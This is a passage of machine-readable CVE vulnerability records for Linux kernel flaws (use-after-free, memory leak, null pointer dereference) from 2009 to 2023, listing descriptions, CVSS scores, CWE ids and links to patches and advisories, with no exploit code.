            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=8c21c54a53ab21842f5050fa090f26b03c0313d6"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2022-10-21T00:00:00.000Z",
          "value": "Advisory disclosed"
        },
        {
          "lang": "en",
          "time": "2022-10-21T00:00:00.000Z",
          "value": "CVE reserved"
        },
        {
          "lang": "en",
          "time": "2022-10-21T02:00:00.000Z",
          "value": "VulDB entry created"
        },
        {
          "lang": "en",
          "time": "2023-01-03T12:45:09.000Z",
          "value": "VulDB entry last update"
        }
      ],
      "title": "Linux Kernel transport.c j1939_session_destroy memory leak"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3633",
    "datePublished": "2022-10-21T00:00:00",
    "dateReserved": "2022-10-21T00:00:00",
    "dateUpdated": "2024-08-03T01:14:03.231Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3565
Vulnerability from cvelistv5
Published
2022-10-17 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel Bluetooth l1oip_core.c del_timer use after free
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:02.837Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=2568a7e0832ee30b0a351016d03062ab4e0e0a3f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211088"
          },
          {
            "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html"
          },
          {
            "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability, which was classified as critical, has been found in Linux Kernel. Affected by this issue is the function del_timer of the file drivers/isdn/mISDN/l1oip_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211088."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 4.6,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-119",
              "description": "CWE-119 Memory Corruption -\u003e CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-12-24T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=2568a7e0832ee30b0a351016d03062ab4e0e0a3f"
        },
        {
          "url": "https://vuldb.com/?id.211088"
        },
        {
          "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html"
        },
        {
          "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html"
        }
      ],
      "title": "Linux Kernel Bluetooth l1oip_core.c del_timer use after free",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3565",
    "datePublished": "2022-10-17T00:00:00",
    "dateReserved": "2022-10-17T00:00:00",
    "dateUpdated": "2024-08-03T01:14:02.837Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3624
Vulnerability from cvelistv5
Published
2022-10-21 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel IPsec bond_alb.c rlb_arp_xmit memory leak
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:03.276Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=4f5d33f4f798b1c6d92b613f0087f639d9836971"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211928"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability was found in Linux Kernel and classified as problematic. Affected by this issue is the function rlb_arp_xmit of the file drivers/net/bonding/bond_alb.c of the component IPsec. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211928."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-404",
              "description": "CWE-404 Denial of Service -\u003e CWE-401 Memory Leak",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-10-21T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=4f5d33f4f798b1c6d92b613f0087f639d9836971"
        },
        {
          "url": "https://vuldb.com/?id.211928"
        }
      ],
      "title": "Linux Kernel IPsec bond_alb.c rlb_arp_xmit memory leak",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3624",
    "datePublished": "2022-10-21T00:00:00",
    "dateReserved": "2022-10-21T00:00:00",
    "dateUpdated": "2024-08-03T01:14:03.276Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-6817
Vulnerability from cvelistv5
Published
2023-12-18 14:37
Modified
2024-08-02 08:42
Severity
Summary
Use-after-free in Linux kernel's netfilter: nf_tables component
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T08:42:08.222Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=317eb9685095678f2c9f5a8189de698c5354316a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/317eb9685095678f2c9f5a8189de698c5354316a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2023/12/22/6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2023/12/22/13"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "kernel",
          "product": "Kernel",
          "repo": "https://git.kernel.org",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6.7",
              "status": "affected",
              "version": "5.6",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "Lonial Kong"
        },
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "Xingyuan Mo"
        }
      ],
      "datePublic": "2023-12-06T16:14:37+00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A use-after-free vulnerability in the Linux kernel\u0027s netfilter: nf_tables component can be exploited to achieve local privilege escalation.\n\nThe function nft_pipapo_walk did not skip inactive elements during set walk which could lead double deactivations of PIPAPO (Pile Packet Policies) elements, leading to use-after-free.\n\nWe recommend upgrading past commit 317eb9685095678f2c9f5a8189de698c5354316a.\n\n"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-233",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-233 Privilege Escalation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-12-18T14:37:05.986Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=317eb9685095678f2c9f5a8189de698c5354316a"
        },
        {
          "url": "https://kernel.dance/317eb9685095678f2c9f5a8189de698c5354316a"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2023/12/22/6"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2023/12/22/13"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html"
        },
        {
          "url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Use-after-free in Linux kernel\u0027s netfilter: nf_tables component",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2023-6817",
    "datePublished": "2023-12-18T14:37:05.986Z",
    "dateReserved": "2023-12-14T11:29:13.252Z",
    "dateUpdated": "2024-08-02T08:42:08.222Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-4622
Vulnerability from cvelistv5
Published
2023-09-06 13:56
Modified
2024-08-02 07:31
Severity
Summary
Use-after-free in Linux kernel's af_unix component
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T07:31:06.586Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-6.1.y\u0026id=790c2f9d15b594350ae9bca7b236f2b1859de02c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/790c2f9d15b594350ae9bca7b236f2b1859de02c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2023/dsa-5492"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "kernel",
          "product": "Kernel",
          "repo": "https://git.kernel.org",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6.1.47",
              "status": "affected",
              "version": "4.2",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "Billy Jheng Bing-Jhong"
        }
      ],
      "datePublic": "2023-08-23T15:52:42+00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A use-after-free vulnerability in the Linux kernel\u0027s af_unix component can be exploited to achieve local privilege escalation.\n\nThe unix_stream_sendpage() function tries to add data to the last skb in the peer\u0027s recv queue without locking the queue. Thus there is a race where unix_stream_sendpage() could access an skb locklessly that is being released by garbage collection, resulting in use-after-free.\n\nWe recommend upgrading past commit 790c2f9d15b594350ae9bca7b236f2b1859de02c.\n\n"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-233",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-233 Privilege Escalation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-09-06T13:56:56.355Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-6.1.y\u0026id=790c2f9d15b594350ae9bca7b236f2b1859de02c"
        },
        {
          "url": "https://kernel.dance/790c2f9d15b594350ae9bca7b236f2b1859de02c"
        },
        {
          "url": "https://www.debian.org/security/2023/dsa-5492"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
        },
        {
          "url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Use-after-free in Linux kernel\u0027s af_unix component",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2023-4622",
    "datePublished": "2023-09-06T13:56:56.355Z",
    "dateReserved": "2023-08-30T11:57:48.389Z",
    "dateUpdated": "2024-08-02T07:31:06.586Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3606
Vulnerability from cvelistv5
Published
2022-10-19 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel BPF libbpf.c find_prog_by_sec_insn null pointer dereference
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:02.479Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=d0d382f95a9270dcf803539d6781d6bd67e3f5b2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211749"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability was found in Linux Kernel. It has been classified as problematic. This affects the function find_prog_by_sec_insn of the file tools/lib/bpf/libbpf.c of the component BPF. The manipulation leads to null pointer dereference. It is recommended to apply a patch to fix this issue. The identifier VDB-211749 was assigned to this vulnerability."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-404",
              "description": "CWE-404 Denial of Service -\u003e CWE-476 NULL Pointer Dereference",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-10-19T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=d0d382f95a9270dcf803539d6781d6bd67e3f5b2"
        },
        {
          "url": "https://vuldb.com/?id.211749"
        }
      ],
      "title": "Linux Kernel BPF libbpf.c find_prog_by_sec_insn null pointer dereference",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3606",
    "datePublished": "2022-10-19T00:00:00",
    "dateReserved": "2022-10-19T00:00:00",
    "dateUpdated": "2024-08-03T01:14:02.479Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3625
Vulnerability from cvelistv5
Published
2022-10-21 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel IPsec devlink.c devlink_param_get use after free
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:02.495Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=6b4db2e528f650c7fb712961aac36455468d5902"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211929"
          },
          {
            "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability was found in Linux Kernel. It has been classified as critical. This affects the function devlink_param_set/devlink_param_get of the file net/core/devlink.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier VDB-211929 was assigned to this vulnerability."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 4.6,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-119",
              "description": "CWE-119 Memory Corruption -\u003e CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-11-01T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=6b4db2e528f650c7fb712961aac36455468d5902"
        },
        {
          "url": "https://vuldb.com/?id.211929"
        },
        {
          "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html"
        }
      ],
      "title": "Linux Kernel IPsec devlink.c devlink_param_get use after free",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3625",
    "datePublished": "2022-10-21T00:00:00",
    "dateReserved": "2022-10-21T00:00:00",
    "dateUpdated": "2024-08-03T01:14:02.495Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-6932
Vulnerability from cvelistv5
Published
2023-12-19 14:09
Modified
2024-08-02 08:42
Severity
Summary
Use-after-free in Linux kernel's ipv4: igmp component
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T08:42:08.680Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=e2b706c691905fe78468c361aaabc719d0a496f1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/e2b706c691905fe78468c361aaabc719d0a496f1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "kernel",
          "product": "Kernel",
          "repo": "https://git.kernel.org",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6.7",
              "status": "affected",
              "version": "2.6.12",
              "versionType": "custom"
            }
          ]
        }
      ],
      "datePublic": "2023-11-24T15:25:56+00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A use-after-free vulnerability in the Linux kernel\u0027s ipv4: igmp component can be exploited to achieve local privilege escalation.\n\nA race condition can be exploited to cause a timer be mistakenly registered on a RCU read locked object which is freed by another thread.\n\nWe recommend upgrading past commit e2b706c691905fe78468c361aaabc719d0a496f1.\n\n"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-233",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-233 Privilege Escalation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-12-19T14:09:15.662Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=e2b706c691905fe78468c361aaabc719d0a496f1"
        },
        {
          "url": "https://kernel.dance/e2b706c691905fe78468c361aaabc719d0a496f1"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html"
        },
        {
          "url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Use-after-free in Linux kernel\u0027s ipv4: igmp component",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2023-6932",
    "datePublished": "2023-12-19T14:09:15.662Z",
    "dateReserved": "2023-12-18T20:14:26.281Z",
    "dateUpdated": "2024-08-02T08:42:08.680Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2009-2692
Vulnerability from cvelistv5
Published
2009-08-14 15:00
Modified
2024-08-07 05:59
Severity
Summary
The Linux kernel 2.6.0 through 2.6.30.4, and 2.4.4 through 2.4.37.4, does not initialize all function pointers for socket operations in proto_ops structures, which allows local users to trigger a NULL pointer dereference and gain privileges by using mmap to map page zero, placing arbitrary code on this page, and then invoking an unavailable operation, as demonstrated by the sendpage operation (sock_sendpage function) on a PF_PPPOX socket.
References
URLTags
http://www.redhat.com/support/errata/RHSA-2009-1233.htmlvendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/36278third-party-advisory, x_refsource_SECUNIA
http://www.debian.org/security/2009/dsa-1865vendor-advisory, x_refsource_DEBIAN
http://rhn.redhat.com/errata/RHSA-2009-1223.htmlvendor-advisory, x_refsource_REDHAT
http://www.securityfocus.com/archive/1/512019/100/0/threadedmailing-list, x_refsource_BUGTRAQ
http://www.kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.37.5x_refsource_CONFIRM
http://secunia.com/advisories/37298third-party-advisory, x_refsource_SECUNIA
http://wiki.rpath.com/wiki/Advisories:rPSA-2009-0121x_refsource_CONFIRM
http://secunia.com/advisories/36430third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/37471third-party-advisory, x_refsource_SECUNIA
http://rhn.redhat.com/errata/RHSA-2009-1222.htmlvendor-advisory, x_refsource_REDHAT
http://archives.neohapsis.com/archives/fulldisclosure/2009-08/0174.htmlmailing-list, x_refsource_FULLDISC
https://bugzilla.redhat.com/show_bug.cgi?id=516949x_refsource_CONFIRM
https://issues.rpath.com/browse/RPL-3103x_refsource_CONFIRM
http://www.vmware.com/security/advisories/VMSA-2009-0016.htmlx_refsource_CONFIRM
